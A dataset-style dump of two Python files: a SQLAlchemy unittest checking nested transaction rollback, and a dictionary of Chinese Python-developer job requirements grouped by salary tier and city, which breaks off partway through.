text string | size int64 | token_count int64 |
|---|---|---|
import sys, os.path
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
# from brett_sqlalchemy import *
# Can not perform relative when it's parent module is not loaded, so I have to change the system's import path.
from main import *
import unittest
from sqlalchemy.ext.declarative import declarative_base
import os
import json
Base = declarative_base()
sql_config_path = os.path.join(os.path.dirname(os.path.dirname(__file__)), 'db_config.json')
sql_config = open(sql_config_path, 'r')
sql_config = json.load(sql_config)
connection_string = sql_config['server'] + '://' + sql_config['user'] + ':' + sql_config['password'] + '@' + sql_config['address'] + '/' + sql_config['database'] + sql_config['extra']
mode = sql_config['mode']
echo = False
# if mode == 'develop' or 'debug':
# echo = True
provider = ConnectionProvider(connection_string, echo=echo)
configure_provider(provider)
provider.start()
engine = provider._engine
class ModelA(Base, TimeStampMixin, SoftDeleteMixin):
__tablename__ = 'test_model_a'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String(50))
class ModelB(Base, TimeStampMixin, SoftDeleteMixin):
__tablename__ = 'test_model_b'
id = Column(Integer, primary_key=True, autoincrement=True)
name = Column(String(50), unique=True)
metadata = Base.metadata
metadata.create_all(engine)
class TestSession(unittest.TestCase):
# @classmethod
# def setupClass(cls):
# metadata = Base.metadata
# metadata.create_all(engine)
#
# def test_normal_session(self):
#
# @db()
# def add_one(name, session):
# instance_a = ModelA(name=name)
# session.add(instance_a)
#
# @db()
# def query_one(name, session):
# instance_a = session.query(ModelA).filter_by(name=name).first()
# if hasattr(instance_a, 'name'):
# return instance_a.name
# return None
#
#
# add_one('Eureka')
# name = query_one('Eureka')
# self.assertEqual(name, 'Eureka')
def test_nest_transaction_(self):
@db
def insert_multi_success(session, outer):
insert_one('Spring', outer=outer)
insert_one('Summer', outer=outer)
insert_one('Autumn', outer=outer)
@db
def insert_multi_fail(session, outer):
insert_one('Winter', outer=outer)
insert_one('Winter', outer=outer)
insert_one('Peace', outer=outer)
@db
def insert_one(name, session, outer):
instance_a = ModelB(name=name)
session.add(instance_a)
@db
def query_one(name, session, outer):
instance_a = session.query(ModelB).filter_by(name=name).first()
if hasattr(instance_a, 'name'):
return instance_a.name
return None
insert_multi_success()
spring = query_one('Spring')
summer = query_one('Summer')
autumn = query_one('Autumn')
self.assertEqual(spring, 'Spring')
self.assertEqual(summer, 'Summer')
self.assertEqual(autumn, 'Autumn')
insert_multi_fail()
winter = query_one('Winter')
self.assertFalse(winter)
| 3,284 | 1,044 |
# 整理各个阶段的技能要求
"""
分大类:
Python(语言类):
数据库:
服务器:
其他:
"""
fourth_chart = {'first': [
{'demands': ['精通Python语言',
'熟悉Python多进程应用开发',
'熟练掌握至少一门PythonWeb开发框架(Tornado、Django、Flask等)',
'熟练使用mysql,redis,mongodb',
'熟悉Linux、分布式、微服务、高性能Web服务开发、有一定的系统架构设计能力者优先',
'拥有良好的代码习惯,结构清晰,命名规范,逻辑性强',
],
'salary': '10-12K',
'site': '北京'},
{'demands': ['精通python/shell编程,有良好的编程习惯,能够实现高效、可靠的代码',
'负责服务端业务开发',
'对软件工程深入理解,熟悉面向对象的分析和设计技术,熟悉linux平台',
'有搜索引擎开发能力有限',
'此岗位为外派到360的岗位项目稳定',
'数据蜘蛛系统开发',
'有政府项目开发背景',
'具有良好的沟通能力和独立解决问题的能力,有积极进取的创新精神',
'具有搜索相关/大并发/高性能系统开发经验,或具有深厚的算法基础理论知识者优先'],
'salary': '10-14K',
'site': '北京'},
{'demands': [
'具有机器/深度学习框架的开发经验,如sklearn、xgboost、TensorFlow、PyTorch等',
'了解图像领域的常⻅任务及其发展脉络'
'赋能客户使用OCRSDK完成自动建模和模型上线',
'负责区域内OCR项目支持工作,包括POC项目、交付项目',
'负责带领客户进行建模方案设计、项目实施、并进行项目管理,确保达成项目目标',
'了解常⽤的图像处理技术,掌握opencv、pillow等图像处理库',
'积极主动,能够在有限资源下追求最好的结果',
'具有一年以上python开发及测试经验,熟练掌握numpy等常用python库',
'熟悉linux开发环境,会使用常见的shell命令',
'熟悉CLI,docker,git工具链',
'了解C/S架构,了解restfulapi规范,http协议',
'计算机或相关专业,了解常用数据结构和算法',
'在GitHub上有1k+star的开源项目',
],
'salary': '8-10K',
'site': '北京'},
{'demands': [
'编写自动化测试用例',
'熟悉pep8规范,有良好的编程风格',
'至少一年及以上Python开发经验,有良好的编程能力',
'熟练使用SQL,熟悉PostgreSQL、MySQL等数据库',
'参与产品需求分析和评审',
'负责模型设计、详细设计和接口设计与评审',
'编码实现功能需求,修复Bug缺陷和代码评审'
],
'salary': '9-14K',
'site': '上海'},
{'demands': ['练操作Linux系统(熟练使用Linux命令)',
'熟练使用VNC等远程访问工具(最好能对芯片电路板有一定了解)',
'熟练使用Python,BAT等脚本语言',
'熟练使用JIAR和HSD等Bug管理工具'],
'salary': '8-12K·13薪',
'site': '上海'},
{'demands': ['从事搜狗客户端产品的统计管理系统的设计和开发',
'熟练掌握python脚本语言,使用过Django前端框架',
'熟练使用HTML/CSS/Javascript/jquery/bootstrap等前端技术,代码符合W3C标准、兼容主流浏览器',
'参与现有产品的设计和讨论',
'熟悉Linux环境,熟悉SQL语句'],
'salary': '4-7K',
'site': '北京'},
{'demands': [
'良好的交流表达能力,能够配合客户部同事梳理解决疑难问题.',
'有较好的协作能力和团队精神',
'熟练使用shell或者Python进行服务器的维护,和自动化脚本的开发,有系统架构设计者优先.',
'精通熟练python开发,使用过Django,Redis,Mysql,3年以上经历',
'业界领先,全额社保,年终奖,六险一金',
'专科及以上学历,软件工程相关专业,数据结构等基础扎实,有编码洁癖,很好的面向对象思维.',
'负责公司socialCRM产品的开发'
],
'salary': '10-15K·13薪',
'site': '北京'},
{'demands': [
'熟练掌握python编程熟悉python相关web框架,如Django,Flask等',
'硕士及以上,计算机',
'编写并执行测试用例,准确跟踪模块的缺陷或问题',
'熟悉Linux系统操作,可独立完成小型python项目的开发',
'熟练运用测试方法及工具对模块及接口性能进行测试,准确发现性能短板',
'熟练使用python性能测试工具与http接口测试工具,如lineprofiler,apachebench等',
'加分项:具有python项目开发经验,或具有python自动化测试经验者优先',
'支持项目python方面的相关开发工作'
],
'salary': '2-4K',
'site': '北京'},
{'demands': [
'工作积极主动,认真细致,有独立思考意识',
'熟悉网络安全产品优先考虑',
'熟悉linux开发环境,熟悉常用shell命令',
'扎实的python基础,熟悉python常用库的使用至少连续一年python开发经验有良好的编码习惯',
'熟悉django开发框架,了解restapi设计模式',
'python开发实习生,应届毕业生,初级开发工程师',
'熟悉mysql数据库使用,熟悉至少一种缓存数据库使用',
'良好的沟通能力,能与团队成员有效沟通'
],
'salary': '9-12K',
'site': '北京'},
{'demands': [
'有2年以上Python开发经验,能独立完成需求',
'熟练掌握Python语言,熟悉python数据分析类库,有numpy',
'熟悉python的RestfulAPI常用框架,及Pythonweb框架如:Django',
'拥有良好的代码编写风格,要求结构清晰,命名规范,逻辑性强,了解技术文档编写规范具有良好的学习能力',
'熟悉Linux系统,熟悉常用爬虫框架,如Scrapy,webmagic等',
'熟悉数据库mysql'
],
'salary': '10-15K',
'site': '北京'},
{'demands': [
'负责分布式的网络爬虫应用,实现大规模文本,进行多平台信息的抓取和分析',
'图像数据的抓取、抽取,去重、分类、垃圾过滤、解析入库等工作',
'负责基于电商风控引擎大数据平台批量自动生成数据分析报告',
'支持数据分析'
],
'salary': '8-13K',
'site': '西安'}],
'second': [
{'demands': ['4熟悉mysql等关系数据库的使用',
'1参与公司产品后台服务的设计、开发、优化等研发工作,保证产品的质量和开发进度',
'1-3年以上python开发经验或其他语言经验丰富,基础扎实,有意转python开发者亦可',
'研究新兴技术,对产品进行持续优化',
'熟悉pythonweb框架,django、tornado、flask等任意一种',
'熟悉linux,git的使用'],
'salary': '15-25K',
'site': '北京'},
{'demands': ['3年以上python开发经验',
'熟悉Linux指令,git管理',
'熟悉mySQL',
'python多线程,多进程,会flask框架',
'有大数据和机器学习工作经验的优先考虑',
'华为大数据项目,AI领域,非外派,软通总部办公'],
'salary': '12-20K',
'site': '北京'},
{'demands': ['参与公司相关产品的架构优化,性能优化及其模块的技术实现',
'计算机相关专业毕业3年以上Python开发经验',
'负责所属模块的前后端开发',
'良好的代码风格和开发习惯',
'熟悉常见的存储方案,包括MySQL',
'性格积极乐观,诚信,较好的沟通能力,文档整理能力',
'良好的问题理解能力,能够理解以及处理复杂逻辑',
'具备强烈的进取心',
'熟悉常见的Web框架,包括Django,Tornado,Flask等',
'负责公司智能管理信息化系统模块的功能规划',
'熟悉主流前端框架,了解React',
'具备OA系统'],
'salary': '20-40K·16薪',
'site': '上海'},
{'demands': ['精通异步网络编程,多线程编程,HTTP协议,异步框架Async,集群与负载均衡,消息中间件等技术',
'5年以上Python开发经验',
'根据产品需求,进行系统设计和编码,持续对系统架构进行改造和优化',
'熟练使用Linux操作系统,具有基础服务维护能力',
'理解并能应用RESTFul规范,具备较强的编程能力和良好的编码风格、结构清晰,命名规范,逻辑性强,代码冗余率低',
'根据需求制定技术方案,项目计划以及开发,学习研究,并将之应用到工作当中',
'熟练使用Mysql,Redis、PostgreSQL等',
'负责公司OCR模块接口的功能开发和代码维护,能独立完成子系统和功能模块开发,编写完整的接口文档',
'熟悉常用Web服务器软件如ApacheNginx等',
'熟悉Python编程语言,熟悉flaskdjangotornado其中至少一种Web开发框',
'熟悉网页抓取原理及技术,能够总结分析不同网站,网页的结构特点及规律'],
'salary': '20-25K·13薪',
'site': '上海'},
{'demands': ['熟悉Mysql的使用,优化,及常用的非关系型数据库',
'有运维,部署相关操作经验',
'参与公司项目的设计和开发',
'熟练使用Python进行开发,至少熟悉一种后端框架,Django或者Flask,有Django项目开发者优先',
'参与服务端性能的调优和迭代',
'熟练使用异步,消息队列',
'有docker使用经验',
'了解前端技术',
'了解Linux环境开发,熟练使用常用命令'],
'salary': '15-25K·13薪',
'site': '上海'},
{'demands': ['熟悉Linux系统和网络知识,扎实的基本功,熟悉设计模式',
'熟悉Python者优先,包括但不限于:sklearn,多线程,matplotlib等',
'了解或希望从事深度学习、机器学习方向相关工作者优先',
'有良好的问题解决能力,难题公关经验,能主动推动项目的进展并达成项目目标'],
'salary': '11-16K·13薪',
'site': '北京'},
{'demands': ['熟悉操作系统和网络知识',
'熟悉Docker,Kubernetes等容器技术',
'熟练掌握Python开发',
'负责开源堡垒机Jumpserver(https://github.com/jumpserver/jumpserver/)的开发工作',
'了解angular,阅读过开源代码,活跃于开源社区者优先',
'熟悉LinuxShell编程',
'有良好的数据结构和算法基础',
'有丰富的Django开发经验',
'熟悉jQuery'],
'salary': '20-30K',
'site': '北京'},
{'demands': ['(3)熟悉Linux平台,熟悉Linux操作系统运维和Linux系统管理,维护,使用',
'(1)熟悉python语言',
'(2)5年以上的软件开发经验',
'熟练掌握python',
'有大型互联网IT系统的项目开发',
'主要技术要点:python、mysql数据库、docker、git、云平台网络',
'熟练掌握微服务架构,熟悉容器编程',
'熟悉云平台网络技术,包括物理网络(交换机',
'(4)熟悉数据库表结构设计和使用,有分布式系统及异步任务系统开发经验者优先',
'岗位要求说明',
'有软件工程意识,熟悉面向对象编程的思想',
'(5)在弹性计算、存储、数据库、网络、中间件、安全、操作系统、虚拟化、基础设施(数据中心/网络/服务器)等任一领域有一定理解'],
'salary': '12-19K',
'site': '北京'},
{'demands': ['熟悉Linux、Git、Markdown等常用开发环境及协作形式,熟悉项目文档管理,有相关项目经验者优先',
'熟练使用Mysql/PostgreSQL,熟悉Nosql数据库如Redis等,有hadoop经验更佳',
'有独立分析和解决问题的能力,有良好的团队合作精神和沟通能力',
'编写简洁、高效、清晰和可测试的代码,并通过单元测试、集成测试和CodeReview等保障代码质量',
'熟练掌握Flask、Django等Web框架,熟悉SQLAlchemy等ORM框架,及Pandas等数据处理框架',
'-岗位职责:',
'-任职要求:',
'参与后台服务的设计、开发、优化、维护等研发工作'],
'salary': '15-25K',
'site': '北京'},
{'demands': ['精通分布式文件存储系统原理,有分布式存储系统运维开发经验优先,有seafile产品运维开发经验更佳',
'熟悉Linux操作系统',
'熟悉java开发更佳,有实际生产部署经验更佳',
'负责研发运维工具,提升运维效率',
'熟悉Python语言',
'了解c\\\\c++语言,能够读懂代码更佳,熟练掌握vuereacthtmlcssjs更佳',
'熟悉分布式文件存储系统原理有企业网盘运维经验',
'帮助部署代码,承担一定的python代码开发',
'负责大文件&文件云平台(企业网盘)的运维,保证高可用',
'有一定的源码阅读经验,能够快速学习心的技术,能够阅读英文文档'],
'salary': '15-25K',
'site': '上海'},
{'demands': ['熟悉MySQL等关系型数据库,熟悉SQL语言',
'有基本的计算机基础理论知识,熟悉常用数据机构与算法',
'能够熟练使用Linux作为日常开发环境',
'思路清晰、主动性强,有缜密的逻辑思维能力,快速的英文阅读能力及学习能力,良好的沟通能力',
'对TCP/IP,HTTP等常用协议有基本的了解,能完整叙述一次HTTP请求从客户端到服务器端所经过的各个环节',
'根据项目组需求,对已有的网站增加新的功能,bugfix等',
'熟悉ES6,有Vue',
'能熟练使用Python进行Web程序相关开发,掌握Django等相关框架'],
'salary': '13-15K',
'site': '上海'},
{'demands': ['熟练掌握Python后端开发,掌握unitest测试框架,有测试代码开发经验优先;',
'熟练掌握数据结构',
'负责Python自动化开发',
'负责指导业务团队自动化脚本开发,涉及UI界面类自动化',
'熟悉Linux操作系统,TCPIP协议',
'构建自动化脚本开发支撑库,提升自动化脚本开发效率'],
'salary': '12-23K',
'site': '上海'},
{'demands': ['负责后台系统的开发',
'精通Python,掌握Django框架,熟悉djangorestframework',
'优化HDFS,Impala,Hive的读写性能',
'熟悉MySQL或Oracle数据库',
'要求有海量数据处理经验',
'对历史数据进行清洗,转换',
'有其他Web后台使用经验或其他语言如Go,Java优先',
'优化系统在海量数据下运行速度',
'熟悉Hadoop生态,掌握HDFS、Hive、Impala使用方式优先'],
'salary': '20-40K',
'site': '上海'},
{'demands': ['负责运营后台的网站前后端维护及功能实现',
'协助负责游戏服务端功能实现,性能优化等',
'熟悉django,html,css',
'熟悉多种数据库技术,包括MySQL,Redis,MongoDB等',
'熟悉python及相关的库,熟悉linux环境',
'具备服务器性能及代码性能优化能力,具备高并发流量下的请求处理经验',
'保证服务端的稳定性',
'相关的工具开发,相关文档的书写'],
'salary': '12-24K·13薪',
'site': '北京'},
{'demands': ['熟悉NoSQL技术,如Redis/MongoDB等,有Mongokit/MongoEngine使用经验尤佳',
'熟悉TypeScript/Rust/Go等',
'有自己的开源Python开发项目',
'负责业务规则引擎和ApiEngine的研发',
'主要工作内容:',
'负责同城智能协作配送SaaS产品PaaS系统开发和维护工作',
'二年以上Python完整项目开发经验',
'负责基于k8s的基础服务系统开发',
'有激情爱学习愿意提升,愿意以创业心态做事',
'Flask/Django/Tornado/Gevent/Nsq/ZeroRPC/ZeroMQ以上技术至少有2项以上的开发应用经验',
'展示自己的Github项目',
'趣钱包等金融产品的研发'],
'salary': '11-20K',
'site': '北京'},
{'demands': ['熟练掌握Python,Django/Tonado,MySQL/PostgreSQL,Redis等组件',
'独立思考,有产品意识,能提出系统改善和产品优化者优先',
'深入了解TCP/UDP协议,进程间通讯编程,熟悉各类服务器架构并能合理的应用',
'负责在线大流量高并发系统设计和性能调优',
'3年以上开发项目经验,至少3年的Python开发经验,有异步编程开发经验',
'【岗位职责】',
'了解前端相关技术,VUE',
'负责高质量的设计和编码工作,承担重点',
'负责系统的技术方案',
'【任职要求】',
'熟悉大数据相关工具ES者优先',
'具有良好的数据结构和算法基础,具备扎实的编程能力',
'负责体育比分产品后台系统和接口的研发,形成规范化的软件代码和单元测试文档',
'根据产品规划,制定后台系统的开发'],
'salary': '20-25K·14薪',
'site': '北京'},
{'demands': ['熟悉一种或多种数据库者优先,如Oracle',
'有一年及以上Python开发经验',
'有linux操作系统'],
'salary': '12-24K',
'site': '北京'},
{'demands': ['设计和开发基于KVM虚拟机的高可用(HA)功能,保证用户业务的连续性',
'设计和开发大规模集群的异步任务调度中心,提供高并发且稳定的调度功能',
'撰写细致的设计文档,并对其他同事的代码进行审查',
'具有2年或以上软件开发工作经验',
'具有Web后台开发经验',
'计算引擎研发工程师',
'设计和开发基于KVM、VMware、Docker/Kubernetes等虚拟化和容器化技术的统一管理平台',
'有Kubernetes的开发经验或代码贡献者',
'有大规模集群系统的开发经验,对软件高可用,高并发有深刻的理解',
'具有基于以下至少一种软件开发的经验,包括MySQL、MongoDB、Redis、Cassandra、ElasticSearch、ZooKeeper等',
'代码风格干净简洁,具有极高的软件质量标准',
'热爱编程,具有以下任一种语言的扎实的编程经验:Python、Golang、Java',
'有基于KVM、Qemu、Libvirt、Openstack等项目开发的经验',
'与测试、产品、售前和售后部门密切配合,不断提升产品质量和竞争力',
'具有独立完成复杂功能的经历,能够完成完备的设计文档,清晰的接口定义,能够有效的进行任务拆分',
'设计和实现健壮、清晰的RESTfulAPI',
'熟悉Linux环境编程,理解I/O模型、事件模型、协程、线程池等基本概念,具有异步网络编程经验'],
'salary': '15-30K·14薪',
'site': '北京'},
{'demands': ['负责公司产品的功能开发',
'能够按照规范化流程进行项目实施,能够做好项目代码质量的管控',
'熟悉Flask',
'熟练掌握Python开发语言',
'配合完成编制项目实施计划,协调资源并按计划推进项目实施工作,按时按质交付',
'熟悉主流Windows/Linux攻防技巧者优先',
'熟悉信息安全产品,有信息安全行业工作经验者优先',
'乐于分享,积极参加技术讨论交流会,活跃团队内技术氛围'],
'salary': '15-20K',
'site': '北京'},
{'demands': ['有大数据和机器学习工作经验的优先考虑',
'熟悉mySQL,redis,elasticsearch,http,websocket,webhook',
'熟悉Linux指令,git管理',
'python多线程,多进程,flask框架'],
'salary': '12-20K',
'site': '北京'},
{'demands': ['参与相关业务',
'熟练使用Redis',
'jinjasqlalchemy熟练使用',
'负责产品后端设计',
'Mysql熟练使用并且有大数量处理经验',
'有优秀的解决问题的能力,有很强的学习能力',
'2年以上Python开发经验,具有实际项目开发经验,承担过核心开发任务',
'根据产品需求和技术演进,制定技术方案,项目计划,并制定相应方案执行'],
'salary': '15-25K',
'site': '北京'},
{'demands': ['负责分析业务领域比较复杂的问题,根据业务需求选择技术解决方案',
'对系统及平台进行完善维护,包括功能改进、系统优化及技术支持等',
'熟悉SOA架构,具备HTTP,TCP等网络服务端开发经验',
'编写符合规范的功能结构定义、需求说明、开发设计等技术文档',
'有成为全栈的潜力和强大的自我学习能力希望成为进可攻前,退可守线的全栈大牛',
'能够独立完成业务设计和相关技术实现,分析并解决开发过程中的问题',
'熟悉Nginx、Apache、Tomcat、HAproxy等',
'熟悉Docker容器技术和OpenStack架构者优先',
'精通Python语言,两年及以上Python开发经验,能解决实际开发中遇到的问题',
'精通Django、Tornado、Flask等主流开发框架(之一)',
'熟练操作Linux,能进行脚本编程和系统维护',
'掌握MySql、MongoDB、Redis等数据库的使用,同时熟悉NoSQL类型数据库者优先',
'思路清晰,具备服务意识和良好的沟通能力、理解能力和团队合作能力',
'有良好的编程习惯,包括好的设计文档,单元测试,代码审查,适应敏捷开发模式',
'参与平台项目的设计与开发工作,包括需求分析、系统设计、编码和单元测试等工作',
'能够独立完成详细设计及编码、进行代码审查'],
'salary': '15-25K',
'site': '上海'},
{'demands': ['具备网络安全产品研发经验',
'熟悉kvm和Docker容器技术,了解kvm和Docker技术框架,熟练使用kvm和Docker命令',
'熟悉常用的数据库和缓存组件,包括但不限于Mysql、Redis、Mongo等',
'需熟悉各类Linux操作系统,具备独立数据库设计并且调优的能力',
'熟练使用Python常用框架Django、Tornado、Flask,熟悉RestfulAPI',
'其他研发负责人安排的任务',
'精通Python开发,并具有3年以上Python开发经验',
'熟悉unix/linux环境开发,熟悉使用常用的shell命令',
'产品研发及研发任务完成'],
'salary': '15-30K·14薪',
'site': '北京'},
{'demands': ['精通Python语言,代码风格良好,3年以上python开发经验;',
'熟悉面向对象的软件设计及设计模式;',
'熟悉Git工作流,可以和团队协同工作熟悉Linux下开发',
'有openstack开发经验优先',
'扎实的计算机基础,熟练掌握数据结构、算法、计算机网络、操作系统等基础知识',
'精通数据模型的设计优化及常用DB的调优;',
'精通常见的PythonWeb框架,包括但不限于Django'],
'salary': '13-25K',
'site': '北京'},
{'demands': ['负责服务、API开发',
'负责Python后端服务开发,解决业务逻辑和数据产品相关业务',
'熟悉NoSQL技术,如Redis/MongoDB等,能够独立地合理设计数据库结构,有Mongokit/MongoEngine使用经验尤佳;',
'有独立开发项目,上线维护及架构能力',
'业务规则引擎和ApiEngine的研发',
'熟悉Pandas,对大数据数理统计建模有相关经验者优先',
'有较强的数据建模能力,逻辑思维能力以及业务理解能力;',
'有自己的开源Python开发项目',
'参加业务线上运维,故障应急处理',
'精通Linux操作系统、熟悉掌握Linux下常用命令,有Shell编程能力;',
'展示自己的Github项目'],
'salary': '15-24K',
'site': '北京'},
{'demands': ['熟悉python语言,有2年使用经验,熟悉常用的web框架如flask',
'熟练使用Linux命令',
'熟练使用git等代码管理工具',
'可适应出差',
'基于Python开发WebService,包括设计、代码编写、单元测试、bug解决等',
'熟悉c/c++编程优先',
'有OCR、人脸识别开发经验优先',
'熟悉HTML,CSS,Javascript等前端开发'],
'salary': '13-18K·13薪',
'site': '北京'},
{'demands': ['熟练掌握Django开发框架,熟悉其他Python开发框架者优先',
'配合其他研发人员完成模块研发',
'根据解决方案进行指定模块研发,并对其进行优化及维护',
'3年以上Python开发工作经验,具有良好的编程风格,具备后端性能最优化和安全最大化的知识及能力,具有大型网站项目开发经验者优先',
'优化现有产品的功能和体验细节',
'【岗位职责】',
'负责公司数据产品设计和代码实现',
'计算机相关专业,专科以上国家正规院校毕业',
'熟悉数据库,精通SQL和数据结构,具有MySQL等关系型数据库开发经验,有其他数据库PostgreSQL/MongoDB工作经验者优先',
'熟悉Linux/Unix基本操作,能够编写shell脚本'],
'salary': '15-30K',
'site': '上海'},
{'demands': ['与后端开发人员合作,完成公司B端前端业务系统的研发',
'配合项目经理完成相关任务目标',
'计算机及相关专业,5年以上python开发经验,有完整项目开发经验或企业级产品开发经验优先,熟悉开发工作流程',
'丰富的PyQt开发GUI经验',
'有Python调用后端RestfulAPI的项目经验',
'有Python读写USB串口的项目经验;',
'有Python绘制动态曲线的经验,熟练使用matplotlib或其他类库绘制动态曲线',
'负责相关技术实现文档的撰写',
'与项目组的其他成员合作,能承受短期交付的压力',
'分析并解决软件开发过程中的问题'],
'salary': '15-25K',
'site': '北京'},
{'demands': ['熟练掌握数据结构及算法',
'有实际工程落地以及部署经验者优先',
'收集整理客户反馈意见、产品实施过程问题,汇总成文档并进行问题追踪处理',
'熟练掌握Python开发(必须)',
'对客户进行产品使用培训、指导、问题解答和技术支持',
'为客户快速接入OCR产品和服务,包括实施开发、数据对接、调试(需要会写Python)',
'参与测试流程,并对产品提出问题与看法'],
'salary': '15-25K·14薪',
'site': '上海'},
{'demands': ['熟悉Web开发相关技术栈,Web框架',
'本岗位负责公司AI平台的研发,通过提升AI平台的能力,提高公司AI解决方案的交付能力',
'熟练掌握Python编程语言,及Python相关的WEB开发框架,比如Django',
'2年以上的Python开发经验,同时掌握一门静态语言如C/C++/JAVA优先',
'参与公司内部AI相关的创新工具的研发',
'熟悉基本数据结构与常用算法了解机器学习相关算法优先',
'熟悉MySQL,Redis,Mango数据库',
'有Docker',
'了解消息中间件的原理和开发(例如RabbitMQ)',
'有分布式系统开发使用经验者优先',
'对工作热情积极'],
'salary': '15-20K·14薪',
'site': '北京'},
{'demands': ['熟练使用python编程了解Django、tornado、Flask等常用的Web框架开发有一定的Git、VIM使用经验',
'参与技术方案讨论和技术调研',
'负责相关工具开发和相关文档的编写',
'良好的沟通与表达能力、思路清晰,较强的动手能力与逻辑分析能力',
'热爱工作,有良好的学习能力,能够接受新鲜事务,对新技术及新模块可以快速掌握运用',
'负责服务器端后台设计、功能开发及维护',
'负责服务器性能的优化,保证服务端稳定安全的运行',
'熟练使用Linux系统,对算法、数据结构有一定了解',
'产品上线后,保障运营平台的稳定,解决相关技术问题',
'熟练掌握MySQL/Memcached/ElasticSerch等常用存储技术(数据库系统)'],
'salary': '20-40K·14薪',
'site': '北京'},
{'demands': ['五年以上Python开发经验,熟悉Python运行环境、运行原理,有JAVA开发经验优先',
'持续对系统架构进行改造和优化',
'按照要求编写设计文档',
'熟悉敏捷开发,编写高质量的代码,构建可重复使用的代码以及公共库',
'任职要求',
'有自动化运维经验优先,比如CMDB,发布系统,配置中心,调度系统,监控系统,工单系统等',
'能够及时快速处理服务器的各种突发问题',
'职位描述(主要职责)',
'根据产品功能模块设计,编写核心代码,并确保开发质量与进度'],
'salary': '18-29K',
'site': '北京'},
{'demands': ['熟悉python其他扩展模块',
'参与量化平台',
'精通SQL编写,熟练使用至少一种关系型数据库',
'熟练掌握python,掌握numpy',
'精通python语言,有扎实的编码能力,良好的编码习惯和学习能力',
'有解决复杂的反爬限制实践经验',
'完成需求',
'根据产品或项目的要求'],
'salary': '17-26K·13薪',
'site': '上海'},
{'demands': ['岗位要求:熟悉Linux系统使用、配置,具备Shell、Python、Java、C中一种或多种编码能力工作地点:北京/西安',
'Python开发测试工程师'],
'salary': '15-30K',
'site': '北京'},
{'demands': ['可以按照人天或月薪支付费用皆可',
'英文口语流利',
'精通flask框架',
'上海急需1名英文好的Python开发工程师,属于外派性质',
'精通MySQL或者postgreaql,docker,',
'大专及以上学历,至少3年以上Python开发经验'],
'salary': '13-15K',
'site': '上海'},
{'demands': ['参与产品沟通,需求分析,方案设计,程序开发,运营优化,架构设计,做到系统可控',
'2年及以上Python实际项目经验,精通Web开发框架如Flask/Django',
'熟悉Docker,Kubernetes,DevOps,ETL/ELT,ELK等相关技术加分',
'良好的沟通能力加分,优秀的解决问题能力加分,不对个人技术路线设限',
'海量数据大访问量的内存与存储系统',
'精通MySQL或其他关系型数据库,精通Redis/MongoDB熟悉Nginx配置',
'扎实的面向对象编程思想,模块化编程的思维,应用性能优化等方面问题的分析和解决能力',
'负责移动互联网游戏服务器端PythonWebService开发,为全球用户提供可靠服务',
'除Python外,至少还熟悉Perl/Java/C#中的一门编程语言,有实际编写经验'],
'salary': '11-22K',
'site': '北京'},
{'demands': ['分析重点行业客户的信息资料,构建客户资产信息知识图谱',
'熟悉甲方行业客户的软/硬件信息者优先',
'负责收集',
'计算机',
'熟练掌握Python/C/C++语言',
'掌握Elasticsearch/MongoDB数据库的使用',
'熟悉爬虫框架,能够从相关网站提取信息和进行数据分析',
'建设情报分析平台,根据需求输出行业化情报信息'],
'salary': '12-20K',
'site': '北京'},
{'demands': ['熟悉Python的高级特性,具备良好的编码习惯,深入理解各种设计模式和应用场景',
'负责并持续优化算法和AI底层模块封装的研发(类型:图像提取、图像匹配、图像内容分析、图像设计质量等)',
'掌握Django,Tornado,Flask等一种主流框架,深入理解框架实现原理及特性',
'搭建基于WEB内部机器学习训练平台,完成算法效率的提升和基础能力沉淀',
'理解算法与应用之间的封装和整合,负责将模块进行产品化的架构设计、维护和研发',
'熟悉Internet常用协议,如HTTP、TCP/IP、熟悉RESTful规范',
'掌握至少一种关系型数据库,了解Docker运维知识',
'数学功底和建模能力强,熟悉机器学习领域的常见原理以及AI适用场景、优点、缺点以及弥补办法',
'有一定外文文献的阅读能力,对计算机视觉、计算机图形学有极大兴趣者优先'],
'salary': '20-30K·13薪',
'site': '上海'},
{'demands': ['了解C/C++编译、打包、发布流程,或有相关经验',
'代码风格,符合Python官方规范,并且能轻松通过静态代码检查',
'python开发基本要求:',
'了解测试基本概念,熟练使用一种测试框架',
'有分布式编程经验',
'有基于容器的集群管理、部署、运维经验',
'适应能力强,热爱编程,勤奋努力',
'理解Web编程,熟练使用至少一种框架',
'有CI/CD经验',
'理解容器技术,熟练使用DockerCLI,能开发Dockerfile',
'熟练使用异步、并发编程',
'了解Python生态,会打包发布Python软件',
'熟练使用至少一种Linux发行版,能开发简单Shell脚本',
'有开源项目经验',
'理解CLI编程,熟练使用参数解析、日志打印、网络请求等基本操作'],
'salary': '11-21K',
'site': '上海'},
{'demands': ['熟练掌握mysql/redis数据库使用,熟悉linux操作系统及shell编程,熟悉git的使用',
'熟悉微服务开发模式,了解docker\\k8s,具有良好的编码规范意识',
'有熟悉的开发框架,具备服务化开发能力',
'【岗位职责】',
'负责子系统架构、模块化设计、分析,以及核心代码编写,提升软件性能、可靠性、可维护性、可扩展性',
'熟练Python开发',
'承担公有云、私有云、SDN/NFV、IOT等运营、运维系统中相关模块的分析、设计、开发工作'],
'salary': '15-30K·14薪',
'site': '杭州'},
{'demands': ['项目名称:华为大脑大型搜索引擎项目',
'知识图谱数据采集爬虫开发',
'负责DC模块的开发与部署',
'具备较强的安全意识和一定安全风险控制能力',
'保存数据到MongoDB',
'使用coufluent-kafka模块替代kafka-python模块,解决分发时send的处理瓶颈',
'该搜索引擎类似google搜索,通过用户搜索的query解析得到用户可能想要找到的网站、数据及相关信息',
'设计爬虫策略和防屏蔽规则,解决字体干扰',
'熟悉Python语言,能够熟练使用python的web框架设计网站,例如django等',
'提升处理能力到每秒10w条数据,分发效率为每秒1000w条',
'熟悉多线程',
'分析网页结构',
'有较强的逻辑思维能力,对技术有强烈的兴趣,具有良好的学习能力',
'参与通用爬虫系统中爬虫模块的开发与维护',
'熟悉Linux/Unix类开发环境,熟悉其常用命令的使用;熟悉MySQL,Redis,MongoDB',
'采用多线程',
'搜索引擎搜索引擎开发',
'采用多进程的方式提高DC模块的数据处理能力',
'工作主动性强,能承受一定的工作压力',
'负责智能搜索中股票和汇率的后端开发与部署内容',
'有过分布式任务调度管理(celery)的经验,可熟练编写高并发程序',
'团队现有PYTHON工程师50人+后端及爬虫岗位都招聘',
'消费kafka中上游解析的网页数据,通过不同的策略和规则过滤分发给网页',
'具有良好的工作态度和职业道德',
'具有较强的表达能力,能主动沟通'],
'salary': '13-26K',
'site': '深圳'},
